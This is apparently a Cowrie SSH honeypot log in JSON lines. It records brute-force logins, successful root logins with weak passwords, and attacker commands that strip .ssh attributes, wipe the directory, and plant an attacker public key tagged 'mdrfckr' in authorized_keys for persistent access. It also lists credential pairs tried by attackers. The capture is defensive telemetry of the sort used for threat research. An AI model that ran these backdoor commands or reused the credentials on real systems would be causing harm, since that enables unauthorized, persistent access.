{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:24:56.977271Z","src_ip":"212.227.235.229","session":"140d99a2babb"}
{"eventid":"cowrie.login.failed","username":"john","password":"123","message":"login attempt [john/123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:24:57.516479Z","src_ip":"212.227.235.229","session":"140d99a2babb"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:24:58.655623Z","src_ip":"212.227.235.229","session":"140d99a2babb"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63570,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a6552c783e7","protocol":"ssh","message":"New connection: 217.72.205.35:63570 (1.2.3.4:22) [session: 0a6552c783e7]","sensor":"my-vps","timestamp":"2025-09-08T23:25:15.898348Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:25:15.899730Z","src_ip":"217.72.205.35","session":"0a6552c783e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50638,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4b188969500","protocol":"ssh","message":"New connection: 212.227.235.229:50638 (1.2.3.4:22) [session: e4b188969500]","sensor":"my-vps","timestamp":"2025-09-08T23:25:37.395883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:25:37.396899Z","src_ip":"212.227.235.229","session":"e4b188969500"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:25:37.699647Z","src_ip":"212.227.235.229","session":"e4b188969500"}
{"eventid":"cowrie.login.success","username":"root","password":"zzz","message":"login attempt [root/zzz] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:25:38.952773Z","src_ip":"212.227.235.229","session":"e4b188969500"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:25:39.855916Z","src_ip":"212.227.235.229","session":"e4b188969500"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:25:39.856662Z","src_ip":"212.227.235.229","session":"e4b188969500"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:25:39.857550Z","src_ip":"212.227.235.229","session":"e4b188969500"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:25:40.161328Z","src_ip":"212.227.235.229","session":"e4b188969500"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:25:40.782210Z","src_ip":"212.227.235.229","session":"e4b188969500"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:25:40.783041Z","src_ip":"212.227.235.229","session":"e4b188969500"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:25:41.087240Z","src_ip":"212.227.235.229","session":"e4b188969500"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:25:41.088182Z","src_ip":"212.227.235.229","session":"e4b188969500"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50640,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3df3146e0c0","protocol":"ssh","message":"New connection: 212.227.235.229:50640 (1.2.3.4:22) [session: f3df3146e0c0]","sensor":"my-vps","timestamp":"2025-09-08T23:25:41.406594Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:25:41.407286Z","src_ip":"212.227.235.229","session":"f3df3146e0c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:25:41.723897Z","src_ip":"212.227.235.229","session":"f3df3146e0c0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:25:43.034876Z","src_ip":"212.227.235.229","session":"f3df3146e0c0"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:25:44.353879Z","src_ip":"212.227.235.229","session":"f3df3146e0c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50656,"dst_ip":"1.2.3.4","dst_port":22,"session":"56df674ff1df","protocol":"ssh","message":"New connection: 212.227.235.229:50656 (1.2.3.4:22) [session: 56df674ff1df]","sensor":"my-vps","timestamp":"2025-09-08T23:25:44.652154Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:25:44.653016Z","src_ip":"212.227.235.229","session":"56df674ff1df"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:25:44.955001Z","src_ip":"212.227.235.229","session":"56df674ff1df"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:25:46.213391Z","src_ip":"212.227.235.229","session":"56df674ff1df"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:25:46.758379Z","src_ip":"212.227.235.229","session":"e4b188969500"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:25:46.759296Z","src_ip":"212.227.235.229","session":"56df674ff1df"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":64001,"dst_ip":"1.2.3.4","dst_port":22,"session":"dcc3a87202bf","protocol":"ssh","message":"New connection: 212.227.125.160:64001 (1.2.3.4:22) [session: dcc3a87202bf]","sensor":"my-vps","timestamp":"2025-09-08T23:25:53.051596Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:25:53.103030Z","src_ip":"212.227.125.160","session":"dcc3a87202bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57854,"dst_ip":"1.2.3.4","dst_port":22,"session":"a124c802a698","protocol":"ssh","message":"New connection: 212.227.235.229:57854 (1.2.3.4:22) [session: a124c802a698]","sensor":"my-vps","timestamp":"2025-09-08T23:26:07.427448Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:26:07.428415Z","src_ip":"212.227.235.229","session":"a124c802a698"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:26:07.561238Z","src_ip":"212.227.235.229","session":"a124c802a698"}
{"eventid":"cowrie.login.failed","username":"svn","password":"changeme","message":"login attempt [svn/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T23:26:08.144397Z","src_ip":"212.227.235.229","session":"a124c802a698"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:26:09.290201Z","src_ip":"212.227.235.229","session":"a124c802a698"}
{"eventid":"cowrie.session.connect","src_ip":"3.131.215.38","src_port":48684,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f841f2ff743","protocol":"ssh","message":"New connection: 3.131.215.38:48684 (1.2.3.4:22) [session: 1f841f2ff743]","sensor":"my-vps","timestamp":"2025-09-08T23:26:19.898034Z"}
{"eventid":"cowrie.client.version","version":"","message":"Remote SSH version: ","sensor":"my-vps","timestamp":"2025-09-08T23:26:19.899013Z","src_ip":"3.131.215.38","session":"1f841f2ff743"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:26:19.899762Z","src_ip":"3.131.215.38","session":"1f841f2ff743"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:26:39.663568Z","src_ip":"79.124.8.120","session":"a8ceb6e24af7"}
{"eventid":"cowrie.session.closed","duration":180.10453820228577,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:26:39.668589Z","src_ip":"79.124.8.120","session":"a8ceb6e24af7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58482,"dst_ip":"1.2.3.4","dst_port":22,"session":"9371a989124c","protocol":"ssh","message":"New connection: 212.227.235.229:58482 (1.2.3.4:22) [session: 9371a989124c]","sensor":"my-vps","timestamp":"2025-09-08T23:27:03.033406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:27:03.034476Z","src_ip":"212.227.235.229","session":"9371a989124c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:27:03.343450Z","src_ip":"212.227.235.229","session":"9371a989124c"}
{"eventid":"cowrie.login.success","username":"root","password":"Server!@#$","message":"login attempt [root/Server!@#$] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:27:04.857418Z","src_ip":"212.227.235.229","session":"9371a989124c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:27:05.521287Z","src_ip":"212.227.235.229","session":"9371a989124c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:27:05.521946Z","src_ip":"212.227.235.229","session":"9371a989124c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:27:05.523459Z","src_ip":"212.227.235.229","session":"9371a989124c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:27:05.832780Z","src_ip":"212.227.235.229","session":"9371a989124c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:27:06.517982Z","src_ip":"212.227.235.229","session":"9371a989124c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:27:06.518816Z","src_ip":"212.227.235.229","session":"9371a989124c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:27:06.829623Z","src_ip":"212.227.235.229","session":"9371a989124c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:27:06.830592Z","src_ip":"212.227.235.229","session":"9371a989124c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36918,"dst_ip":"1.2.3.4","dst_port":22,"session":"af57b8ed9b90","protocol":"ssh","message":"New connection: 212.227.235.229:36918 (1.2.3.4:22) [session: af57b8ed9b90]","sensor":"my-vps","timestamp":"2025-09-08T23:27:07.151947Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:27:07.152736Z","src_ip":"212.227.235.229","session":"af57b8ed9b90"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none",